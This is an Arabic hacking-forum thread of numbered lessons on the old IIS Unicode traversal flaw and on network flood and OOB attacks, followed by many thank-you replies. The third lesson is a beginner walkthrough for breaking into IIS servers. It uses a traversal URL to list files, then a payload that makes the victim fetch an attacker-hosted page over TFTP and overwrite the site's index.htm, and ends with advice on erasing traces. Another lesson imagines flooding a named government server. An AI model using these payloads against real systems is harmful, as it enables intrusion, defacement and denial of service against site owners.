, Wed, 27 Jun 2007 15:33:23 +0200
الدرس الثالث والاربعين
عثرة اليونيكود


تقوم لوحه محارف يونيكود بتحديد رقم مختلف لكل حرف من حروفها مهما كانت بيئة التشغيل
التي تعمل ضمنها المحارف حيث أن معظم الشركات المنتجة لنظم التشغيل تعتمد على اليونيكود
لجعل نظمها عامله بأكثر من لغه وفي نظام ويندز يمكن ان يشكل استعمال يونيكود ثغره
يمكن للهاكرز منها أن يعبثوا بالاجهزة المزودة وذلك بارسال عنون انترنت URL
يحوي على متتالية يونيكود UTF-8 غير صحيحة مجبرا بذلك الجهاز المزود على تشغيل جميع الملفات
التنفيذية الموجودة ضمن الدليل الذي يتم الهجوم عليه ويعرف هذا الهجوم باسم الهجمات التجاوزية
Directory Traversal Attack
فضمن نظام الويندز يتم تمثيل العلامات \ و / ضمن ويندز بالحروف 5% و 2% على التوالي
ومع ذلك يمكن تمثيل هذه العلامات باستخدام مايدعى بالمتتاليات بالغه الطول overlong
وهي عبارة عن متتاليات تزيد في طولها عما هو لازم لتمثيل حرف معين ضمن لوحه المحارف
حيث يمكن للهاكر تمثيل العلامة / بالحروف c0%af% DHz
(( طبعا احذف كلمه DHz علشان تطلع لك مضبوطة انا وضعتها علشان تطلع مضبوطة ))
مستخدما 2 بايت لتمثيل حرف يحتاج الى 1 بايت فقط ولما لم يكن مزود الانترنت IIS مكتوبا ليقوم بفحص
المتتاليات البالغه الطول فان وجود مثل هذه المتتاليات ضمن عنوان URL
يمكن له ان يتجاوز الاحتياطات الامنية لنظام ويندز واذا كان الطلب الوارد الى المزود واردا الى الدليل (( تنفيذي ))
فإن ماسيحدث هو ان جميع الملفات التنفيذيه .exe الموجودة في هذا الدليل ستبدأ بالعمل عشوائيا
وسيعتمد ضررها على نوعيه الملفات التنفيذية الموجودة ضمن هذا الدليل وتؤثر هذه العله على جميع نظم الويندزان تي4
التي تستخدم المزود IIS4 او ويندز 2000 الذي يستخدم IIS5 والتي لن يتم تطبيق حزمة الخدمات 2 عليها
وكي يحدد مدراء المعلوماتيه امكانية تعرضهم لمثل هذا الاختراق فما عليهم الا تشغيل الامر hfnetchk
وهي اداه مصممه كي يتمكن مدراء المعلوماتيه من اكتشاف الرقع التي تم تطبيقها على نظم التشغيل
ويمكن له ان يعمل عبر الشبكة ويمكن تنزيل هذا البرنامج من هذا العنوان :
http://www.microsoft.com/technet/tr...ls/hfnetchk.asp
وقم تم تصليح عثرة اليونيكود من الرقع التالية من مايكروسوفت :
Q269862 - MS00-057
Q269862 - MS00-078
Q277873 - MS00-086
Q293826 - MS00-026
Q301625 - MS00-044
اضافة الى حزمة الخدمات 2 لويندز 2000 واذا لم تكن اي من هذه الرقع موجودة فان النظام يكون عرضة لهذه العثرة
كما يمكن اختبار نظامك من خلال طباعه الامر التالي وتنفيذه من خلال مزود الويب IIS :
http://victim/scripts/..%c0%af../wi....exe?/c+dir+c:\ (http://victim/scripts/..%c0%af../wi....exe?/c+dir+c:%5C)
ويمكن تغيير هذا العنوان ليناسب تكوين جهاز معين واذا كان مدير النظام قد قام بالتخلص من دليل ملفات النصوص
التنفيذية Scripts ( كما هو مقترح ) فان هذا الامر لن يؤدي الى ايه نتائج ولذا يمكن للشخص الذي يجري الاختبار
ان يقوم بانشاء دليل cgi-bin بدلا من دليل النصوص التنفيذية وتطبيق هذا الامر عليه واذا كان النظام معرضا لهذه الثغره فانة سيقوم بارجاع قائمة تحتوي على جميع الملفات الموجودة على القرص الصلب
وقد قامت مايكروسوفت بتطوير برمجيات يمكنها اكتشاف هذه الثغره وحماية المستخدمين منها واحدها هو برنامج
IIS Lockdown والمصمم لمساعده مدراء الشبكات على اغلاق مزودات IIS ويمكن تنزيل هذا البرنامج من العنوان
http://www.microsoft.com/technet/se...ls/locktool.asp
كما ان هناك برنامج اخر وهو URLScan والذي يقوم بتصفييييية العديد من طلبات HTTP بما في ذلك تصفيييية
محارف اليونيكود UTF-8 ويتوفر هذا البرنامج على العنوان التالي :
http://www.microsoft.com/technet/security/URLScan.asp

Linux Root
, Wed, 27 Jun 2007 15:35:50 +0200
الدرس الرابع والاربعين
أنواع الهجوم على الأجهزة


هناك أنواع مختلفة وكثيرة جدا من الهجوم على جهازك أثناء العمل على الشبكة
(أكثر بمراحل من أن اجمعها في موضوع واحد) ولكن سألخص بروتوكولات الأتصال هنا وطرق الهجوم عليها وسبل الحماية منه وانظمة التشغيل المتضررة بكل هجوم.


النوع الأول :
هجوم الـ(ICMP) او ما يسمى بـ (بروتوكول التحكم برسائل الأنترنت)
(InternetControlMessageProtocol). وهو يعتمد على أرسال رسائل خطأ مضمونة في حزمة واحدة على التي سي بي نفسه TCP/IP. على سبيل المثال أذا اردت الأتصال بهوست معين مثل سيرفر الايرسي (IRC Servers) وتجد صعوبة في الأتصال به وبرسالة مثل (Host Unreachable) أو (Connection Time Out) وهو من نوع (ICMP_Unreach Packets) أو حزم عدم الوصول.
والـICMP يمكن أستخدامه أيضا لمعرفة معلومات عن شبكة معينة.
والسؤال الآن هو كيف يمكن لهذا الهجوم ان يلحق الضرر بك؟ والأجابة هي انه عند ارسال ارسال حزم كبيرة و سريعة من البنق Ping الى TCP/IP الخاص بك (وهذا ما يسمى بالفلود Flood) ويتوجب على جهازك تحليل كل حزمة وتفصيلها والرد عليها وهذا بالتأكيد مالا يستطيعه لكبر حجمها وكثرتها مما يؤدي غالبا الى عمل ريست للأتصال (Reset Connection) سواء كان اتصال بهوست معين أو بموفو الخدمة الخاص بك ايضا (ISP)!!
والآن تخيل مثلاً خمسمائة جهاز يوجهون هجوما قويا ومتتاليا على سيرفر معين (مثلا سيرفر http://www.israel.gov)،/ (http://www.israel.gov%29%d8%8c/) هذا السيرفر لن يتمكن من الرد على كل اتصال موجه له بنفس الوقت بهذا الحجم والسرعة العاليين. مما يؤدي غالبا (بأستخدام توقيت وتخطيط مناسب) الى عزل هذا تقريبا عن بقية الشبكة .
ونوع آخر شهير جدا ويكثر أستخدامه في سيرفرات الايرسي او الشات وهو ICMP_Protocol_Unprotocol وهذا النوع يمكن أستخدامه لفصل أتصالك بسيرفر
محادثة معين. مثلا سيرفر المايكروسوفت شات لو انك متصل به على سيرفره irc.msn.com عبر المنفذ 6667 (منفذ شبكة محادثة MSN) وحدث انه تم قطع اتصالك بالسيرفر عدة مرات متتالية دون سبب محدد، فأنك قد تعرضت للهجوم على TCP/IP الخاص بك من النوع المذكور سابقا والذي يعتمد على ارسال رسائل عديدة وسريعة الى المنفذ 6667 من جهاز العدو وعبر سيرفر المحادثة واخيرا الى جهازك مما يؤدي الى تضعيف المنفذ 6667 وبالتالي قطع اتصالك بالسيرفر المذكور.

والحماية من هذا النوع من الهجوم كالتالي:
برامج عديدة يمكنك استخدامها مثل الفايروول الذي يوفر درجة معقولة من الحماية ضد هذا الهجوم. وهناك ايضا برامج كتبت خصيصا لمنع مثل هذا الهجوم مثل
Nuke Napper
ICMP Watcher
ConSeal PC Firewall
والتي تقوم بحجب هذه الحزم عن جهازك (Blocking ICMP Packets)
(ملحوظة: جميع البرامج السابقة لا توفر الحماية مائة بالمائة وانما هي مضمونة بخاصة اذا كنت معرض لهجوم من مصادر محدودة او مصدر واحدبأتصال غير قوي جدا)

نوع اخر من الحماية هو الباتشات التي تطلقها الشركات مثل الباتش الذي اطلقته مايكروسوفت لمستخدمي ويندوز 95 لأغلاق منفذ 139 ضد هجوم معين منICMP و هو SPing والذي كان يؤدي الى عمل ريست للأتصال بالشبكة بالكامل. وبالطبع تمت معالجة هذا العيب في الأصدارات التالية من ويندوز. وبرغم انه نوع قديم من الهجوم واغلب الأنظمة الآن متوفرة لديها الحماية منه الا اني متأكد بانه مازال هنالك اشخاص معرضين لمثل هذا النوع من الهجوم.

الأنظمة المعرضة لهجوم الـICMP
ويندوز 95 وويندوز NT الأصدار القديم كانا معرضين لخطر الهجوم من قبل فلود الـICMP الذي كان يؤدي الى عمل كراش Crash لهما. وبغض النظر عن اي نظام تستخدم فأنه معرض لخطر الفلود من قبل ICMP.

----------------------------------------------------------------
UDP :
او ما يسمى بـ(UserDatagramProtocol) وهو مصمم لبرامج معينة لا تحتاج الى تقسيم رسائلها الى حزم اصغر وارسالها مثل TCP الذي سيتم شرحه لاحقا. وهو بالضبط كالتي سي بي من حيث تقسيمه الى منافذ متعددة لتتمكن عدة برامج من استخدامه في نفس الوقت. ويحتوي على رأس توجيهي مثل التي سي بي ايضا ولكنه اقصر منه. وعلى كل حال له ارقام للمصدر وارقام للوجهة. وهذا البروتوكول يستخدم غالبا في عملية البحث عن اسم موقع كما سيتم شرحه بالاسفل.
من السابق نستنتج ان الفلود هذا البروتوكول يكون ضعيف جدا مقارنة بغيره من البروتوكولات وذلك لصغر حجم بياناته. ولكنه هجوم لايمكن تجاهله وبخاصة اذا وصل الى مرحلة عالية وسرعة عالية فأنه يؤدي الى أبطاء اتصالك ونادرا ما يقطع اتصالك.

الحماية:
البرنامج الوحيد الذي رأيته ويقوم بالحماية من فلود اليو دي بي هو الفايروول (من نوع كونسيل ConSeal). ولكنني متأكد من وجود أدوات اخرى للحماية منه

أنظمة التشغيل المتضررة منه:
جميع اصدارات الويندوز وحتى اليونكس نفسه من الممكن ايقافه اذا وجهت له حزم ضخمة من اليو دي بس في الوقت المناسب

----------------------------------------------------
TCP:
وهو ما يسمى ببروتوكول التحكم في الأرسال (TransmissionControlProtocol). وهو بروتوكول مسؤول عن تقسيم الرسائل الواردة الى حزم صغيرة ومن ثم يعيد تجميعها بشكل وترتيب جديد ليتمكن جهازك من قراءتها. وفي اغلب البرامج تكون الرسائل صغيرة بحيث يمكن ضمها في حزمة واحدة فقط. مثلا عند كتابتك لموقع في متصفحك فان نظامك يتوجب عليه ان يقوم بعملية التحويل الشهيرة من اسم الى عنوان (شبيه برقم الآيبي) ومن ثم يرسل الأمر بالبحث عنه والذي عادة ما يكون في حزمة واحدة.
والتي سي بي اي بي بالطبع يقوم بأعمال اخرى اضافة لعملية التقسيم والتجميع فأنه يقوم بالتأكد من وصول المعلومة المطلوبة الى جهازك وأعادة ارسال حزمة الطلب اذا توجب الأمر.
والسؤال هنا: كيف يمكن الهجوم على بروتوكول كهذا يقوم بتقسيم الرسائل الكبيرة!?
الأجابة هي انه يمكن الهجوم عليه مثل الهجوم على النظامين السابقين بالضبط أي عن طريق الفلود. وهنا يكون عن طريق ارسال حزم طلب كثيرة اليه وبالطبع سيحاول الرد عليها كلها وهذا مالايستطيعه وبخاصة اذا كانت الحزم كثيرة جدا وفي وقت زمني قليل. وعند كمية معينة بسرعة عالية معينة تعتمد على قوة اتصالك يبدأ التأثير الكبير لهكذا هجوم.

الحماية منه :
بالطبع برامج الفايروول وبرامج اخرى عديدة تجدها بمواقع الهكر منتشرة وتقوم بحمايتك من الفلود الموجه للـTCP الخاص بك.

أنظمة التشغيل المتأثرة:
جميع اصدارات الويندوز تتأثر بهذا الهجوم وأيضا جميع طبقات اليونكس تتأثر بهجوم معين يؤدي الى ايقافها مؤقتا (لاق Lag) أو حتى فصل اتصالها وبالطبع يعتمد على درجة الحماية للسيرفر المتعرض للهجوم.

ملاحظة: أشهر واكثر برنامج منتشر يقوم بالهجوم على هذا البروتوكول لنظام ويندوز هو برنامج (Port Fuck) الذي يقوم بالأتصال عبر منافذ التي سي بسرعة علية ومن ثم الفصل واعادة العملية عدة مرات بسرعة. وبالنسبة للينوكس فهنالك انواع عديدة من نصوص (.C) التي تقوم بهجوم كهذا.
----------------------------------------------------

OOB
أو ما يسمى بـ(OutOfBand). وهو خطير جداً لأنه لا يحتاج لعمل شئ كثير لأنشاء تأثير كبير في جهاز الضحية.
وعن طريق أرسال معلومات OOB الى منفذ رقم 139 الخاص بويندوز NT (الأصدارات القديمة بالطبع) فأنه من الممكن بسهولة أحداث أثر كبير في جهاز الضحية منها تدمير TCP الخاص بجهاز الضحية (stop 0xA error in tcp.sys). وكل ما تحتاج اليه هو الأتصال بالمنفذ المفتوح فقط (Connect the Socket). أي بالطريقة التالية: (الأتصال بمنفذ رقم 139 في جهاز الضحية ومن ثم المعلومات المضرة به - send the MSG_OOB flag set).
وبالطبع فأن ويندوز 95 كذلك معرض لهذا النوع من الهجوم ولكن بضرر أقل حيث انه لا يتم تجميده بالكامل ولكن يفقد أتصاله او يضعفه.
وقد تجد صعوبة في تنفيذ الكلام السابق ولكن لاداعي لأجهاد نفسك فبرامج الهجوم عن طريق OOB تكاد تملأ مواقع الهكر في كل مكان وبأشكال والوان عديدة مثل برنامح (WinNuke) القديم، والتي لا تطلب منك سوى رقم الآيبي للضحية فقط ومن ثم الضغط على زر Nuke. ولكنه أيجاد ضحية يتضرر بهجوم كهذا قريب من المستحيل في الوقت الحالي.
وبالطبع وجود عيب كهذا في نظام شهير ومنتشر كالويندوز يؤدي الى وجود باتش مخصص لأغلاق المنفذ واصلاح النظام. (يعني ترقيع). أسم الباتش (OOB Fix) ويمكنك الحصول عليه من اي موقع هكر تقريبا.

الحماية من OOB:
كما ذكرت سابقا يمكنك استخدام (رقعة المايكروسوت) او هنالك عدة برامج تحمي من مثل هذا الهجوم عن طريق مراقبة المنفذ 139 وصد الهجوم القادم عبره. وتقريبا جميع انواع الفايروول تتعرف على هجوم قديم كهذا.

أنظمة التشغيل المتضررة بالـOOB:
ويندوز 95 وويندوز NT القديم -كما ذكرت سابقا- تتضرر بهكذا هجوم عليها.

Linux Root
, Wed, 27 Jun 2007 15:38:35 +0200
الدرس الخامس والاربعين
IIS بداية نعرف ماهي

هي خدمه متواجدة في ويندوز الفين بروفشنال وويندوز ان تي IISالـ

IIS5.0...وويندوز الفين يمتلك الاصدارة الخامسة من ملقم معلومات الانترنت

بسم الله نبدأ
توجد نقطة ضعف في الاي اي اس 4 او 5 وهذه النقطة تستغل بطريقة سهلة جداً
وتسمى هذه النقطة باليونيكود
وتنفيذها سهلاً لايحتاج الى خبرة عميقة في مجال اختراق المواقع
ولكن نقف عند هذه النقطة للمبتئيدئن
المبتدئين عامةً يفكرون الان في اختراق عدة مواقع شهيرة بهذه الطريقة
ولكن لا هذه الطريقة غير مجدية مع المواقع الشهيرة او غير الشهيرة
لان نقطة الضعف هذه لاتوجد الا في ويندوز الفين او ان تي
وأغلب المواقع الشهيرة تستخدم انظمة اليونكس واللنكس
أي ان ويندوز ان تي او الفين نظام حمايته محدودة وكل يوم تطلع ثغرات جديدة
لكن بوسع مدراء المواقع ايقاف نقطة ضعف من نقاط الاضعاف الموجودة في الان تي
لكن بتلك الطريقة قد يكونون جعلو حاجزاً لهم من الهكرة
ولكن ليس دائماً
وتنفذ من داخل المتصفح
وطريقة تنفيذ الثغرة كالاتي :

ركزو هنا الان بعد دوت كوم بدأت تنفيذ الثغرة
وبإمكانك أيضا دخول اي ملف وليس فقط رؤية السي c:هذه الثغرة تسمح لك بــ عرض جميع ملفات

أي بعد دوت كوم
بعض الناس يسألون مالذي يظهر او على اي شكل يظهر
الحل بسيط
Dir هذا الامر لو قمت بكتابته في نافذة الدوس ستظهر لك الملفات
وطريقة ظهور الملفات في المتصفح تقريبا
بنفس طريقة الدوس
إذا نجحت في تنفيذ الثغرة واظهرت الملفات امامك فتبدأ في تنفيذالخطوة الثانية
الخطوة الثانية عمل ابلود للملف الذي تريد تحميله
وعمل الأبلود أيضاً لايحتاج الى خبرة
لكن هنالك شروط لكي تعمل ابلود
يجب التأكد من أن التي إف تي بي مثبت على الموقع الضحية
وللكي تتأكد إتبع الاتي
يجب الدخول على ملف السستم32 ولكي تدخله يجب أن تضيف بعض الكلمات على الثغرة التي نجحت في تنفيذها
مثال:

هذه الثغرة عملت في الموقع المطلوب ورأيت الملفات
لاحظ التغير

ماوضع على الثغرة هو أسماء لملفات متواجدة داخل الويندوز Winnt\Sytem32\
أي يجب عليك الدخول على هذه الملفات لكي تتأكد
بعض القراء يتسالون ..... الثغرة التي نستخدمها ليست متطابقة مع هذه الثغرة ولكن هذا ليس شرط للتطابقها يجب عليك الدخول باي كان على مللف السستم
ممكن يكون احد القراء اشتغلت معاه هذه الثغرة



ويقول كيف ادخل على ملف السستم
الحل هو واحد يجب عليك إضافة اسماء الملفات لكي تدخل على السستم 32
اي بعد هذا الامتداد
c+dir+c:\هنا تضيف أسماء الملفات

كما قلنا سابقاَ لاتحتاج الى خبرة
وبعد دخول ملف السستم ستظهر لك محتوياته
ويجب على آنذاك البحث عن برنامج يسمي
tftp.exe يعني دور على هذا البرنامج الين ماتلقاه وتتأكد من انه في الجهاز
لان هذا البرنامج يعتبر شرط لكي تعمل ابلود للصفحة
ولو لقيت البرنامج اتفاءل بالخير يعني بإذن الله تعبك ماهو رايح على الفاضي
.................................................. .......................................
والشرط الثاني هو
يجب أن يكون عندك برنامج التي إف تي بي
وهذا البرنامج تقدر تنزله من هذا العنوان
www.geocities.com/anorR1234/tftpd32.zip (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.geocities.com/anorR1234/tftpd32.zip%5Cn%5CnThis%20file%20was%20not%20retri eved%20by%20Teleport%20Pro,%20because%20it%20is%20 addressed%20on%20a%20domain%20or%20path%20outside% 20the%20boundaries%20set%20for%20its%20Starting%20 Address.%5Cn%5CnDo%20you%20want%20to%20open%20it%2 0from%20the%20server?%27%29%29window.location=%27h ttp://www.geocities.com/anorR1234/tftpd32.zip%27)
C:\وبعد ماتنزل البرنامج وتفك الضغط منه من الافضل إنك تحطه داخل الـ
وتحط أيضا البرامج أو الصفحة التي تريد أن تعمل لها أبلود في السي
تحطه في السي الى داخل جهازك مو الى دالخل الموقع
وتشغل البرنامج
tftp32.exe وتتركه يعمل الى أن تنتهى من مهمتك الأساسية
C:\أسمع كلامي وحط كل شي في
لأنك لو حطيتها بإذن الله راح تنجح المهمه
-----------------------------------------------------------------
الان بدأنا في النقطة الخطرة وهي تحميل الملفات
مع العلم أني اقصد بالتحميل الابلود
أي
أبلود = تحميل
مو تجميل
وتحميل الملفات طريقة معقدة نسبياً بس أنا متفائل بالخير لأني معتقد أنكم راح تفهمو
المهم نرجع لموضوعنا
المهم طريقة نسخ الملفات تضاف ايضاً الى المتصفح
وتضاف بهذه الطريقة
مثال :

تخيل الثغرة هذه اشتغلت معاك
ويجب عليك إنك تمسح بعض الإضافات من الثغرة لكي تضيف امر النسخ
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index. htm
يعني الى راح نمسحه من الثغرة بيكون هذه الاضافة
/c+dir+c:\
عشان تظيف بدالها
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index. htm
ولمن نظيف امر النسخ بيطلع لنا بهذا الطريقة

شايفين ياشباب إش الى اتغير
بس لازم أيضاً إنك تغير اللازم في أمر النسخ
مثل
tftp.exe هذا سيبه في حاله لانه اسم برنامج التي اف تي بي الى حاطه في السي ومشغله الان
"-i" هذا برضه سيبه لانه مهم
1.1.1.1 هنا بدال الارقام هذا تكتب الايبي تبع جهازك وعشان تتأكد من الايبي لمن تشغب التي اف تي بي راح يطلع ايبي وهذا الايبي الى طلعلك هو الى تكتبه
GET هذه الاضافة سيبها في حالها لانها تعتبر شرط في نسخ المفات
index.htm هذه اسم الصفحة الى راح تتحمل وممكن تغيرها عاد بكيفك انت
C:\inetpub\wwwroot\ وهذا مكان تواجد الصفحة الرئيسة الخاصة بالموقع
index.htm هنا تكتب إسم الصفحة او الملف التي تريده أن يظهر في الموقع
C:\يجب التأكد من إنك حاط الصفحة المراد تحميلها في جهازك داخل الـ
index.htm ومثلا اسم الصفحة
قبل ماتضغط انتر عشان تنسخ الملف تاكد من ان الثغرة الان صارت مشابها لمثل هذه الثغرة

ولو طلعت مشابها لها اضغط إنتر وتوكل على الله
وبإذن الله راح يتنسخ الملف

وفى النقطة الاخيرة والاهم
مسح ملفات تكون تجمعت داخل الجهاز ومكونة معلومات عنك مثل الايبي

--------------------------------------
وهذه لنكات لكي تسد الثغرة داخل موقعك اذا كانت شغالة
Patches to repair this Bug:


تعبت

واخيرا انتهى

والموضوع منقووووووووووووووووووووول للفائدة

تحياتي

شاعر حزن
, Thu, 28 Jun 2007 13:28:40 +0200
نققققققلة موفقة

Linux Root
, Fri, 29 Jun 2007 14:06:14 +0200
مشكور على مرورك

iraqhack
, Sun, 01 Jul 2007 01:35:06 +0200
تثبيت

تحياتي واحترامي

Linux Root
, Sun, 01 Jul 2007 01:38:13 +0200
مشكورررررر حبيبي عراقي هكر على تثبيت

ومنور الموضوع

$AhMeD Z@Ki$
, Sun, 01 Jul 2007 02:00:40 +0200
يعني من صدك الواحد لازم يوكفلك وكفه احترام على هل موضوع الصدك موطبيعي وماكلك بس انته مبدع

ويستاهل التثبيت

Linux Root
, Sun, 01 Jul 2007 02:38:22 +0200
مشكور حبيبي ابو شهاب الورد على مرور الرائع والرد الاروع

منور الموضوع

تحياتي الك

THE DEVIL MASTER
, Sun, 01 Jul 2007 02:55:20 +0200
عاشت ايدك حب صدك انته روعة
وهسه باجر اجي اقرى وانطيك راي

A H M E D
, Sun, 01 Jul 2007 13:06:19 +0200
ولك ششارب من الصبح هههههههه مشكور حبي عاشت ايدك والله

iR@Qi_sTRiKE
, Sun, 01 Jul 2007 13:43:03 +0200
حبيبي شكرا علة الموضوع بس الهكر مينحصر بموضوع واحد لان الهكر عالم واسع وميخلص ويومية شي جديد وشكرا علة مجهودك يا ورد :68:

R.Giggs
, Mon, 02 Jul 2007 15:20:27 +0200
ورده انت عاشت ايدك
انشاء الله تستمر هيج و تتطور بعد

Linux Root
, Wed, 04 Jul 2007 01:08:44 +0200
مشكورين على مرور

SamoDeXiner
, Thu, 12 Jul 2007 17:34:53 +0200
عاشت ايدك عالتعب بالشرح يا ورد
وان شاء الله يستفادون الاخوان

Linux Root
, Fri, 13 Jul 2007 02:33:25 +0200
تدلل عمري ومشكور على مرورك

gelan
, Wed, 08 Aug 2007 13:01:51 +0200
مش عارف اقولك اية والله .......... بجد انت اروع من انى اوصفك جزاك الله كل الخير واتمنى انى اكلمك جدا

S3cur1ty-M!nd
, Thu, 16 Aug 2007 14:09:16 +0200
لك ولله حبي عاشت ايدك رافي يا بطل لك انتة صدك مبدع وهاي الشغلة مال ابداع موجديدة عليكم انتة وعراقي هكر مشكور يا بطل

S3cur1ty-M!nd
, Thu, 16 Aug 2007 14:10:07 +0200
مشكوووووووووووووووووووووور حبي رافي لك انتة مبدع

الوكح
, Sat, 18 Aug 2007 02:00:13 +0200
والله عمي انت ذهب

AliraQis
, Mon, 20 Aug 2007 20:34:54 +0200
شكراً خوي الموضوع رهيب

love_jojo
, Sun, 09 Sep 2007 12:43:17 +0200
مشكووووووووووووووووووووووووووووووور

متلثم بعلم العراق
, Fri, 28 Sep 2007 16:11:01 +0200
يسلمو شرح وافي واكثر من رائع
تحياتي الك يا مبدع

Linux Root
, Fri, 28 Sep 2007 19:30:20 +0200
مشكورين على مرور

perody
, Fri, 05 Oct 2007 00:31:19 +0200
مشكورررررررررررررررررررررررررررررر



حبي

Linux Root
, Fri, 05 Oct 2007 12:26:35 +0200
عفوا حبي ومشكور على مرور

همس السكون
, Sat, 27 Oct 2007 22:51:56 +0200
ششششششششششششكرا على المعلومات

Linux Root
, Sun, 28 Oct 2007 15:50:49 +0100
عفوا وشكرا على مرور

k & j
, Sat, 05 Jan 2008 18:58:57 +0100
مشكور اخوي على هاي المواضيع الحلوة واتمني لك النجاح والموفقية

Linux Root
, Tue, 08 Jan 2008 02:45:49 +0100
تدلل حوب ومشكور على مروروك

hamidi.ilies
, Thu, 07 Feb 2008 16:26:02 +0100
شكر لك على هذه المعلومت:69::f_prettyrosem_3b585

فراس التنين
, Fri, 29 Feb 2008 19:55:26 +0100
مشكور اخي الغالي لاكن الروابط مال برامج الحماية مال+LookDown2000 ما يشتغل ممكن تعدل الرابط او تحاول ان اتدزليا وشكرآ

Linux Root
, Mon, 03 Mar 2008 19:21:48 +0100
مشكور على مرور

حسامنت
, Tue, 04 Mar 2008 15:46:56 +0100
مشكور على المعلومات الغاليه


http://www.******.com/uploads/4tWBL-u5u354977.gif (http://www.******.com/viewer.php?id=4tWBL-u5u354977.gif)

A$MINDFREAK$A
, Tue, 04 Mar 2008 16:57:21 +0100
woOOOww
thaNK YOU

• AbdulaH TariQ • BudY •
, Fri, 14 Mar 2008 10:53:04 +0100
مشكوووووور حبي
عاشت ايدك ورده

alrahana
, Wed, 19 Mar 2008 21:08:47 +0100
السلام عليكم اخي العزيز

شكرا لك على الموضوع المفيد

وانشاء الله نحو التقدم المستمر

واواد ان استفسر عن الحمايه وعند الدخول الى

regedit واخذ الاختيارات .......وعند الوصول الى حذف الملفات من نوع exe

يعني لايوجد ضرر على البرامج التي تم تنصيبها

او اي خلل اخر يذكر

ولك جزيل الشكر

MeMoOo.EnG
, Thu, 20 Mar 2008 06:28:14 +0100
عاشت ايدك والله مضوع مفيد

تقبل مروري

aLiRaQy
, Sun, 06 Apr 2008 22:28:08 +0200
والله انت خرافي عااشت ايدك اني صرت هاكر راح اخترقكم كلكم هههههههههههههههه شكرا حبي

R.Giggs
, Mon, 07 Apr 2008 07:35:37 +0200
حبي مشكور بس الموضوع كلش قديم و منقول
و كيفين منتنك صارله 7 سنين طالع من السجن
و تاريخ الهكرز هو بناء و عطاء مو تدمير
و مشكوره جهودك

Mido love
, Thu, 10 Apr 2008 12:39:27 +0200
مشكووور عيني
والله أبداع حتى بالنقل
مبين عليك كاضيها نقل بالإعدادية وعندك خبرة خخخخخ
تحياتي حُب وعاشت ايدك

evil girl
, Sat, 12 Apr 2008 00:07:24 +0200
عااااااااااااا
هذا اشلون موضوع ايخبل
عاشت ايدك

Linux Root
, Fri, 25 Apr 2008 22:10:17 +0200
مشكورين على مرور

mohanadmix
, Mon, 12 May 2008 16:58:36 +0200
الف شكررررررررررررررررررررر

stars
, Thu, 22 May 2008 11:48:24 +0200
مشكووووووووووووووور